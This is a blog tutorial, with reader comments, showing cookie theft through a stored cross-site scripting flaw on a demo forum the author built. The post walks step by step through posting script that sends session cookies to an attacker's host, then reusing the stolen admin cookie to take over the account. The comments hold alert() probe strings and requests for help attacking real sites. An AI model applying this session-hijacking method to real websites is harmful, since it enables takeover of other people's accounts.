• +
Hacking Tutorial Cookie Stealing via Cross Site Scripting (XSS) Persistent Type

Hacking Tutorial Cookie Stealing via Cross Site Scripting (XSS) Persistent Type

Bookmark

Type : Tutorial

Level : Medium – Hard

My previous tutorial was talking about how to perform Basic Hacking via Cross Site Scripting (XSS) that has a relations with today tutorial.

As I have already wrote on my previous post about two types of Cross Site Scripting (XSS) there is Non-persistent and persistent attack which non persistent data was provided by a web client, and persistent type if the server store and saved the data and then permanently displayed as a normal content to whole user who accessed it.

Today tutorial was about Hacking Tutorial how to do Cookie Stealing via Cross Site Scripting Vulnerability with persistent type. This kind of vulnerability was much more dangerous than the non-persistent one, because it will affect the whole user of the website that has this kind of persistent Cross Site Scripting Vulnerability. This type of vulnerability can give you access to other user account and even to administrator that maintain the website.

To make you can understand much more about this tutorial, I have already create a simple forum using PHP and also a database using MySQL. I know this forum was not user friendly and even sucks ๐Ÿ˜› but the important thing here is the logic about how this attack can happen in real world.

Okay let me introduce about this simple forum first. This simple forum has 3 type of user there is Admin, Registered User, and also Guest (admin, user, and guest). All of this user will have the same board where they can replied one with another to make some conversation, every conversation was saved on database; that's why every user can see their posting history.

Let's start the preparation for our tutorial.

Requirements :

1. Simple Forum created by me. you can download it below (download link)

Download

2. You also can search on the internet by using Google (it really need much time ๐Ÿ˜› )

Step by Step :

1. I have already host this simple forum to the free web hosting out there at vishnuval.byethost10.com. Because I only use 1 computer, I will separate the access between user and admin. Administrator will log in using Google Chrome browser and user was log in using Mozilla Firefox.

username : admin, user, guest

password : admin, user, guest

2. Here's the preview of the main page of our simple forum.

Hacking Tutorial Cookie Stealing via Cross Site Scripting (XSS) Persistent Type

3. While admin log in to this forum, he start to post something to welcoming every user.

Hacking Tutorial Cookie Stealing via Cross Site Scripting (XSS) Persistent Type

4. And then user also log in to the simple forum and start the conversation.

Hacking Tutorial Cookie Stealing via Cross Site Scripting (XSS) Persistent Type

5. Admin log in again and then replied the user

Hacking Tutorial Cookie Stealing via Cross Site Scripting (XSS) Persistent Type

6. BTW, this user was already know that this simple forum website has an XSS hole where he can input some html tags in it. Now he want to collect the cookie available over that message board.

Hacking Tutorial Cookie Stealing via Cross Site Scripting (XSS) Persistent Type

The malicious user was also have other free hosting out there with address attacker.loveslife.biz where he host the other PHP script to record all of the cookie he got from the simple forum.

If you see the picture above, the malicious user put some javascript that refer to his hosting at attacker.loveslife.biz/trap.php.

7. When the administrator log in to that simple forum, he will not found something strange was happen.

Hacking Tutorial Cookie Stealing via Cross Site Scripting (XSS) Persistent Type

Only if the admin show the source of that page he will know that something was wrong there, but in my story, he didn't recognize it ๐Ÿ™‚

8. Soon after admin was log in, then the malicious user open his log file that located on attacker.loveslife.biz/thecookie.txt.

Hacking Tutorial Cookie Stealing via Cross Site Scripting (XSS) Persistent Type

9. Malicious user was using a Mozilla Firefox Addons called Cookies Manager+, where he can modify and add the cookie information.

Hacking Tutorial Cookie Stealing via Cross Site Scripting (XSS) Persistent Type

10. He start to find where's the address for that simple forum, and finally he found it.

Hacking Tutorial Cookie Stealing via Cross Site Scripting (XSS) Persistent Type

11. The malicious user then edit the cookie value to the one he already got on the website attacker.loveslife.biz/thecookie.txt file

Hacking Tutorial Cookie Stealing via Cross Site Scripting (XSS) Persistent Type

12. When he click Save, the malicious user session ID has changed to other one.

Hacking Tutorial Cookie Stealing via Cross Site Scripting (XSS) Persistent Type

13. Now he try to refresh the page to check whether it's work or not….

Hacking Tutorial Cookie Stealing via Cross Site Scripting (XSS) Persistent Type

He already an administrator there ๐Ÿ™‚

If you wasn't clear about the step by step above, you also can view the video below.

 

 

Countermeasures / Prevention :

1. Developer should always filter the user input data.

I hope it's useful ๐Ÿ™‚

Subscribe Now To Get Latest Hacking Tutorial on Your E-Mail

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com

  • manoj kumar

    have you tested it on facebook .
    It is working on ur own website cookie .
    does facebook has similar session id ?

    you get the affected seeion id because you can logged in into it . how can anybody get other person’s session id ?

    • v4L

      #manoj kumar
      1. I haven’t test it, but maybe facebook session isn’t as easy as what I’ve demonstrate here.
      2. If it’s persistent, you will get many session ID; if not persistent, you need to make sure victim open the malicious URL

      • dark_soldier

        how to find XSS vulnerable sites any softwareto check a website is vulnerable to Xss???

        • flame

          (commenting for other users usage(2 years after above comment))
          you can refer to the main xxs tutorial for accurate(you get the page) result…or try acunetix web vuln scanner…but you can only detect what type of vuln but not where the vuln occur..

  • moshe

    nice !!

  • greate presentation but these types of vulnubrities rarely available nowadays…

    • v4L

      #vinay
      yes because most of them use CMS nowadays.

  • khansaa

    hi .. i can not download Forum ay help ?

  • xssatack

    How to start this forum which I downloaded?

  • JaSamDemoUssama

    I get the session ID and i don’t know how to use it ? i use the cookie manager but it doesn’t work for me ! is this work all the time ?

  • car

    Hi,

    Can someone tell me how can i steal a cookie using onload?
    Any help will be appreciated.

  • Ahsun Iqbal

    I am Getting An SQL Error.. What I can do ??

    • Parvez

      Hi.Do you have the code to run this forum.I badly need something like this for my Masters research.Please help me out .

  • taib abdel

    please , what can i do to bypass websense triton , even tor and ultrasurf can’t bypass it , thx in advance

  • Parvez

    Hi.Ho can i get the code to run the forum.I need it badly as i need something like this for my Masters Research paper. Pls help me out. please

  • bala

    i am getting Wrong Username or Password… tried all credentials.. pls hep me

  • Ali

    Sorry Admin i own you … hehe JK lol

  • kris

    alert(“fuck this tutorial”)

    • KSI

      hahahahahahhahahahhahah good 1 m8

  • lets try ._.

    alert(“:v”)

  • :|

    alert(“TEST”)

  • mzabab

    nice

  • ื“ื™ื ื“ื• ืžื—ืžื•ื“ื™

    how to i build this “trap.php” wich can record cookies

  • qwert

    hi

  • qwert

    bold

  • :)

    hi

  • DWADAWD

    alert(“tutorial”);

  • skkie

    alert(“tutorial”);

  • someone
  • Test

    alert(“tutorial”);

  • :D

    “>